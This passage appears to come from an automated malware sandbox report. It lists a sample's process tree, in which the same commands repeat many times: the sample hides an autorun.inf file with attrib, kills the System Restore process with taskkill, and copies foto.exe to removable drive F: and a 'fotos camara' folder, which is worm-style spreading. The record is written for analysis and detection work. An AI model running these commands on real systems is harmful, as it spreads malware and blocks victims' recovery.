    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:1884
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2480
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2112
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2580
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1672
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2640
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2108
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2660
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2444
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:888
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2356
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2144
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1504
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1920
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2004
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2416
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:756
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2080
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:2628
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1248
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:2644
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3040
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2452
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1500
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2504
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:1580
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1108
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:1632
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1664
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:2748
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2728
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:844
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:1016
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1608
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:1756
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1836
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:2668
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:2364
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2036
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2352
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:876
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:872
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:1084
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1716
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1896
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1060
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:1556
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:2464
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:816
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:3056
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2936
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:992
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3016
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2992
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2784
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:2128
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2164
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2868
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2964
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1452
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:2776
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1892
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:1448
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:424
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2788
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - System Location Discovery: System Language Discovery
    - Enumerates system info in registry
    PID:2988
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2168
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1420
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1212
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:736
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2304
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1572
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2860
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2968
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2844
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2796
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1136
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1104
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Drops autorun.inf file
    PID:1484
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1612
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1692
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2540
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:2084
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2684
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2984
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:616
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2316
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:896
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:336
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2752
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1596
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:108
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1792
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3048
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:456
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1080
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:624
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:660
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1132
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:836
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2224
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2000
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    - Views/modifies file attributes
    PID:1492
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2228
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1748
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:264
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2432
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2192
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2580
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:1672
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:672
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1956
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2660
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1588
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2740
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:948
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2356
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:2144
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:532
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:2028
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2004
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2416
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1800
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:2628
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1248
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2928
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2888
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2452
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1500
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1116
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2336
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1108
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:1632
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1124
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1732
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2728
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:844
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2056
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1752
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:2072
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1100
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1592
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:792
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1696
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2352
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2244
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2584
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:1648
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1516
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2624
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1244
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1060
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:1556
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2276
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:816
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2980
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:3020
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1560
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2976
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2932
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2872
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1532
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2164
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2868
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2964
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2884
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1452
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2776
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:1892
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2552
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3052
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2780
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:2832
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2800
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1420
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1212
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Drops autorun.inf file
    - Views/modifies file attributes
    PID:736
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2304
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:1572
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2860
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2968
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2844
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2796
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2100
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:932
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2044
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1260
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2760
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1576
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2180
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2684
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2984
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:2764
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:524
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1180
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2292
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2372
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2880
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2248
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1792
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    - System Location Discovery: System Language Discovery
    PID:3048
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1192
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:964
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1264
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1676
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1600
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:2400
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:860
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2236
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:944
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2132
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2808
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1884
- - C:\Windows\SysWOW64\taskkill.exe
